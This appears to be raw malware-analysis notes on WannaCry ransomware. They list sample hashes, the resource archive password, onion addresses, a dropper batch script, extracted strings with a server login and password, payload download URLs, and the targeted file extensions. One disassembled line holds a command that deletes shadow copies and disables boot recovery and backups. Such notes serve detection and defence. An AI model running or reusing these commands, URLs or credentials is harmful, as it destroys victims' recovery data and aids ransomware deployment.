something

1. md5: 509C41EC97BB81B0567B059AA2F50FE8
2.  
3. Holds Resource .zip:
4. MD5: 5b225149abb8c8eb245445f707e6f0d2
5. Pass: WNcry@2ol7
6.  
7. Contains
8. b.wnry c17170262312f3be7027bc2ca825bf0c
9. c.wnry ae08f79a0d800b82fcbe1b43cdbdbefc
10. r.wnry 3e0020fc529b1c2a061016dd2469ba96
11. t.wnry 5dcaac857e695a65f5c3ef1441a73a8f
12. taskdl.exe 4fef5e34143e646dbf9907c4374276f5
13. taskse.exe 8495400f199ac77853c53b5a3f278f3e
14. u.wnry 7bf2b57f2a205768755c07f238fb32cc
15. m_bulgarian.wnry 95673b0f968c0f55b32204361940d184
16. m_chinese (simplified).wnry 0252d45ca21c8e43c9742285c48e91ad
17. m_chinese (traditional).wnry 2efc3690d67cd073a9406a25005f7cea
18. m_croatian.wnry 17194003fa70ce477326ce2f6deeb270
19. m_czech.wnry 537efeecdfa94cc421e58fd82a58ba9e
20. m_danish.wnry 2c5a3b81d5c4715b7bea01033367fcb5
21. m_dutch.wnry 7a8d499407c6a647c03c4471a67eaad7
22. m_english.wnry fe68c2dc0d2419b38f44d83f2fcf232e
23. m_filipino.wnry 08b9e69b57e4c9b966664f8e1c27ab09
24. m_finnish.wnry 35c2f97eea8819b1caebd23fee732d8f
25. m_german.wnry 3d59bbb5553fe03a89f817819540f469
26. m_greek.wnry fb4e8718fea95bb7479727fde80cb424
27. m_indonesian.wnry 3788f91c694dfc48e12417ce93356b0f
28. m_italian.wnry 30a200f78498990095b36f574b6e8690
29. m_japanese.wnry b77e1221f7ecd0b5d696cb66cda1609e
30. m_korean.wnry 6735cb43fe44832b061eeb3f5956b099
31. m_latvian.wnry c33afb4ecc04ee1bcc6975bea49abe40
32. m_norwegian.wnry ff70cc7c00951084175d12128ce02399
33. m_polish.wnry e79d7f2833a9c2e2553c7fe04a1b63f4
34. m_portuguese.wnry fa948f7d8dfb21ceddd6794f2d56b44f
35. m_romanian.wnry 313e0ececd24f4fa1504118a11bc7986
36. m_russian.wnry 452615db2336d60af7e2057481e4cab5
37. m_slovak.wnry c911aba4ab1da6c28cf86338ab2ab6cc
38. m_spanish.wnry 8d61648d34cba8ae9d1e2a219019add1
39. m_swedish.wnry c7a19984eb9f37198652eaf2fd1ee25c
40. m_turkish.wnry 531ba6b1a5460fc9446946f91cc8c94b
41. m_vietnamese.wnry 8419be28a0dcec3f55823620922b00fa
42.  
43. Onions :
44. gx7ekbenv2riucmf.onion
45. 57g7spgrzlojinas.onion
46. xxlvbrloxvriy2c5.onion
47. 76jdd2ir2embyv47.onion
48. cwwnhwhlz52maqm7.onion
49.  
50.  
51. Script from memory :
52. 0x1000d628, 218, @echo off
53. echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
54. echo SET om = ow.CreateShortcut("%s%s")>> m.vbs
55. echo om.TargetPath = "%s%s">> m.vbs
56. echo om.Save>> m.vbs
57. cscript.exe //nologo m.vbs
58. del m.vbs
59.  
60.  
61.  
62.  
63. u.wnry :
64.  
65. .data:00420FD8 aCVssadminDelet db '/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'
66.  
67.  
68. aFailedToSendYo db 'Failed to send your message!',0Ah
69. .data:00421318 ; char aYourMessageHas[]
70. .data:00421318 aYourMessageHas db 'Your message has been sent successfully!',0
71. .data:00421344 ; char aYouAreSendingT[]
72. .data:00421344 aYouAreSendingT db 'You are sending too many mails! Please try again %d minutes later'
73.  
74.  
75.  
76. Process:
77. 00:34 < nulldot> 0x1000ef48, 24, BAYEGANSRV\administrator
78. 00:34 < nulldot> 0x1000ef7a, 13, Smile465666SA
79. 00:34 < nulldot> 0x1000efc0, 19, wanna18@hotmail.com
80. 00:34 < nulldot> 0x1000eff2, 34, 1QAc9S5EmycqjzzWDc1yiWzr9jJLC8sLiY
81. 00:34 < nulldot> 0x1000f024, 22, sqjolphimrr7jqw6.onion
82. 00:34 < nulldot> 0x1000f088, 52, https://www.dropbox.com/s/deh8s52zazlyy94/t.zip?dl=1
83. 00:34 < nulldot> 0x1000f0ec, 67, https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
84. 00:34 < nulldot> 0x1000f150, 52, https://www.dropbox.com/s/c1gn29iy8erh1ks/m.rar?dl=1
85. 00:34 < nulldot> 0x1000f1b4, 12, 00000000.eky
86. 00:34 < nulldot> 0x1000f270, 12, 00000000.pky
87. 00:34 < nulldot> 0x1000f2a4, 12, 00000000.res
88.  
89.  
90.  
91. Target_Files:
92. data:1000D1F8 aCryptacquireco db 'CryptAcquireContextA',0 ; DATA XREF: sub_10004440+2Do
93. .data:1000D20D align 10h
94. .data:1000D210 dd offset a_doc ; ".doc"
95. .data:1000D214 dd offset a_docx ; ".docx"
96. .data:1000D218 dd offset a_xls ; ".xls"
97. .data:1000D21C dd offset a_xlsx ; ".xlsx"
98. .data:1000D220 dd offset a_ppt ; ".ppt"
99. .data:1000D224 dd offset a_pptx ; ".pptx"
100. .data:1000D228 dd offset a_pst ; ".pst"
101. .data:1000D22C dd offset a_ost ; ".ost"
102. .data:1000D230 dd offset a_msg ; ".msg"
103. .data:1000D234 dd offset a_eml ; ".eml"
104. .data:1000D238 dd offset a_vsd ; ".vsd"
105. .data:1000D23C dd offset a_vsdx ; ".vsdx"
106. .data:1000D240 dd offset a_txt ; ".txt"
107. .data:1000D244 dd offset a_csv ; ".csv"
108. .data:1000D248 dd offset a_rtf ; ".rtf"
109. .data:1000D24C dd offset a_123 ; ".123"
110. .data:1000D250 dd offset a_wks ; ".wks"
111. .data:1000D254 dd offset a_wk1 ; ".wk1"
112. .data:1000D258 dd offset a_pdf ; ".pdf"
113. .data:1000D25C dd offset a_dwg ; ".dwg"
114. .data:1000D260 dd offset a_onetoc2 ; ".onetoc2"
115. .data:1000D264 dd offset a_snt ; ".snt"
116. .data:1000D268 dd offset a_jpeg ; ".jpeg"
117. .data:1000D26C dd offset a_jpg ; ".jpg"
118. .data:1000D274 dd offset a_docb ; ".docb"
119. .data:1000D278 dd offset a_docm ; ".docm"
120. .data:1000D27C dd offset a_dot ; ".dot"
121. .data:1000D280 dd offset a_dotm ; ".dotm"
122. .data:1000D284 dd offset a_dotx ; ".dotx"
123. .data:1000D288 dd offset a_xlsm ; ".xlsm"
124. .data:1000D28C dd offset a_xlsb ; ".xlsb"
125. .data:1000D290 dd offset a_xlw ; ".xlw"
126. .data:1000D294 dd offset a_xlt ; ".xlt"
127. .data:1000D298 dd offset a_xlm ; ".xlm"
128. .data:1000D29C dd offset a_xlc ; ".xlc"
129. .data:1000D2A0 dd offset a_xltx ; ".xltx"
130. .data:1000D2A4 dd offset a_xltm ; ".xltm"
131. .data:1000D2A8 dd offset a_pptm ; ".pptm"
132. .data:1000D2AC dd offset a_pot ; ".pot"
133. .data:1000D2B0 dd offset a_pps ; ".pps"
134. .data:1000D2B4 dd offset a_ppsm ; ".ppsm"
135. .data:1000D2B8 dd offset a_ppsx ; ".ppsx"
136. .data:1000D2BC dd offset a_ppam ; ".ppam"
137. .data:1000D2C0 dd offset a_potx ; ".potx"
138. .data:1000D2C4 dd offset a_potm ; ".potm"
139. .data:1000D2C8 dd offset a_edb ; ".edb"
140. .data:1000D2CC dd offset a_hwp ; ".hwp"
141. .data:1000D2D0 dd offset a_602 ; ".602"
142. .data:1000D2D4 dd offset a_sxi ; ".sxi"
143. .data:1000D2D8 dd offset a_sti ; ".sti"
144. .data:1000D2DC dd offset a_sldx ; ".sldx"
145. .data:1000D2E0 dd offset a_sldm ; ".sldm"
146. .data:1000D2E4 dd offset a_sldm ; ".sldm"
147. .data:1000D2E8 dd offset a_vdi ; ".vdi"
148. .data:1000D2EC dd offset a_vmdk ; ".vmdk"
149. .data:1000D2F0 dd offset a_vmx ; ".vmx"
150. .data:1000D2F4 dd offset a_gpg ; ".gpg"
151. .data:1000D2F8 dd offset a_aes ; ".aes"
152. .data:1000D2FC dd offset a_arc ; ".ARC"
153. .data:1000D300 dd offset a_paq ; ".PAQ"
154. .data:1000D304 dd offset a_bz2 ; ".bz2"
155. .data:1000D308 dd offset a_tbk ; ".tbk"
156. .data:1000D30C dd offset a_bak ; ".bak"
157. .data:1000D310 dd offset a_tar ; ".tar"
158. .data:1000D314 dd offset a_tgz ; ".tgz"
159. .data:1000D318 dd offset a_gz ; ".gz"
160. .data:1000D31C dd offset a_7z ; ".7z"
161. .data:1000D320 dd offset a_rar ; ".rar"
162. .data:1000D324 dd offset a_zip ; ".zip"
163. .data:1000D328 dd offset a_backup ; ".backup"
164. .data:1000D32C dd offset a_iso ; ".iso"
165. .data:1000D330 dd offset a_vcd ; ".vcd"
166. .data:1000D334 dd offset a_bmp ; ".bmp"
167. .data:1000D338 dd offset a_png ; ".png"
168. .data:1000D33C dd offset a_gif ; ".gif"
169. .data:1000D340 dd offset a_raw ; ".raw"
170. .data:1000D344 dd offset a_cgm ; ".cgm"
171. .data:1000D348 dd offset a_tif ; ".tif"
172. .data:1000D34C dd offset a_tiff ; ".tiff"
173. .data:1000D350 dd offset a_nef ; ".nef"
174. .data:1000D354 dd offset a_psd ; ".psd"
175. .data:1000D358 dd offset a_ai ; ".ai"
176. .data:1000D35C dd offset a_svg ; ".svg"
177. .data:1000D360 dd offset a_djvu ; ".djvu"
178. .data:1000D364 dd offset a_m4u ; ".m4u"
179. .data:1000D368 dd offset a_m3u ; ".m3u"
180. .data:1000D36C dd offset a_mid ; ".mid"
181. .data:1000D370 dd offset a_wma ; ".wma"
182. .data:1000D374 dd offset a_flv ; ".flv"
183. .data:1000D378 dd offset a_3g2 ; ".3g2"
184. .data:1000D37C dd offset a_mkv ; ".mkv"
185. .data:1000D380 dd offset a_3gp ; ".3gp"
186. .data:1000D384 dd offset a_mp4 ; ".mp4"
187. .data:1000D388 dd offset a_mov ; ".mov"
188. .data:1000D38C dd offset a_avi ; ".avi"
189. .data:1000D390 dd offset a_asf ; ".asf"
190. .data:1000D394 dd offset a_mpeg ; ".mpeg"
191. .data:1000D398 dd offset a_vob ; ".vob"
192. .data:1000D39C dd offset a_mpg ; ".mpg"
193. .data:1000D3A0 dd offset a_wmv ; ".wmv"
194. .data:1000D3A4 dd offset a_fla ; ".fla"
195. .data:1000D3A8 dd offset a_swf ; ".swf"
196. .data:1000D3AC dd offset a_wav ; ".wav"
197. .data:1000D3B0 dd offset a_mp3 ; ".mp3"
198. .data:1000D3B4 dd offset a_sh ; ".sh"
199. .data:1000D3B8 dd offset a_class ; ".class"
200. .data:1000D3BC dd offset a_jar ; ".jar"
201. .data:1000D3C0 dd offset a_java ; ".java"
202. .data:1000D3C4 dd offset a_rb ; ".rb"
203. .data:1000D3C8 dd offset a_asp ; ".asp"
204. .data:1000D3CC dd offset a_php ; ".php"
205. .data:1000D3D0 dd offset a_jsp ; ".jsp"
206. .data:1000D3D4 dd offset a_brd ; ".brd"
207. .data:1000D3D8 dd offset a_sch ; ".sch"
208. .data:1000D3DC dd offset a_dch ; ".dch"
209. .data:1000D3E0 dd offset a_dip ; ".dip"
210. .data:1000D3E4 dd offset a_pl ; ".pl"
211. .data:1000D3E8 dd offset a_vb ; ".vb"
212. .data:1000D3EC dd offset a_vbs ; ".vbs"
213. .data:1000D3F0 dd offset a_ps1 ; ".ps1"
214. .data:1000D3F4 dd offset a_bat ; ".bat"
215. .data:1000D3F8 dd offset a_cmd ; ".cmd"
216. .data:1000D3FC dd offset a_js ; ".js"
217. .data:1000D400 dd offset a_asm ; ".asm"
218. .data:1000D404 dd offset a_h ; ".h"
219. .data:1000D408 dd offset a_pas ; ".pas"
220. .data:1000D40C dd offset a_cpp ; ".cpp"
221. .data:1000D410 dd offset a_c ; ".c"
222. .data:1000D414 dd offset a_cs ; ".cs"
223. .data:1000D418 dd offset a_suo ; ".suo"
224. .data:1000D41C dd offset a_sln ; ".sln"
225. .data:1000D420 dd offset a_ldf ; ".ldf"
226. .data:1000D424 dd offset a_mdf ; ".mdf"
227. .data:1000D428 dd offset a_ibd ; ".ibd"
228. .data:1000D42C dd offset a_myi ; ".myi"
229. .data:1000D430 dd offset a_myd ; ".myd"
230. .data:1000D434 dd offset a_frm ; ".frm"
231. .data:1000D438 dd offset a_odb ; ".odb"
232. .data:1000D43C dd offset a_dbf ; ".dbf"
233. .data:1000D440 dd offset a_db ; ".db"
234. .data:1000D444 dd offset a_mdb ; ".mdb"
235. .data:1000D448 dd offset a_accdb ; ".accdb"
236. .data:1000D44C dd offset a_sql ; ".sql"
237. .data:1000D450 dd offset a_sqlitedb ; ".sqlitedb"
238. .data:1000D454 dd offset a_sqlite3 ; ".sqlite3"
239. .data:1000D458 dd offset a_asc ; ".asc"
240. .data:1000D45C dd offset a_lay6 ; ".lay6"
241. .data:1000D460 dd offset a_lay ; ".lay"
242. .data:1000D464 dd offset a_mml ; ".mml"
243. .data:1000D468 dd offset a_sxm ; ".sxm"
244. .data:1000D46C dd offset a_otg ; ".otg"
245. .data:1000D470 dd offset a_odg ; ".odg"
246. .data:1000D474 dd offset a_uop ; ".uop"
247. .data:1000D478 dd offset a_std ; ".std"
248. .data:1000D47C dd offset a_sxd ; ".sxd"
249. .data:1000D480 dd offset a_otp ; ".otp"
250. .data:1000D484 dd offset a_odp ; ".odp"
251. .data:1000D488 dd offset a_wb2 ; ".wb2"
252. .data:1000D48C dd offset a_slk ; ".slk"
253. .data:1000D490 dd offset a_dif ; ".dif"
254. .data:1000D494 dd offset a_stc ; ".stc"
255. .data:1000D498 dd offset a_sxc ; ".sxc"
256. .data:1000D49C dd offset a_ots ; ".ots"
257. .data:1000D4A0 dd offset a_ods ; ".ods"
258. .data:1000D4A4 dd offset a_3dm ; ".3dm"
259. .data:1000D4A8 dd offset a_max ; ".max"
260. .data:1000D4AC dd offset a_3ds ; ".3ds"
261. .data:1000D4B0 dd offset a_uot ; ".uot"
262. .data:1000D4B4 dd offset a_stw ; ".stw"
263. .data:1000D4B8 dd offset a_sxw ; ".sxw"
264. .data:1000D4BC dd offset a_ott ; ".ott"
265. .data:1000D4C0 dd offset a_odt ; ".odt"
266. .data:1000D4C4 dd offset a_pem ; ".pem"
267. .data:1000D4C8 dd offset a_p12 ; ".p12"
268. .data:1000D4CC dd offset a_csr ; ".csr"
269. .data:1000D4D0 dd offset a_crt ; ".crt"
270. .data:1000D4D4 dd offset a_key ; ".key"
271. .data:1000D4D8 dd offset a_pfx ; ".pfx"
272. .data:1000D4DC dd offset a_der ; ".der"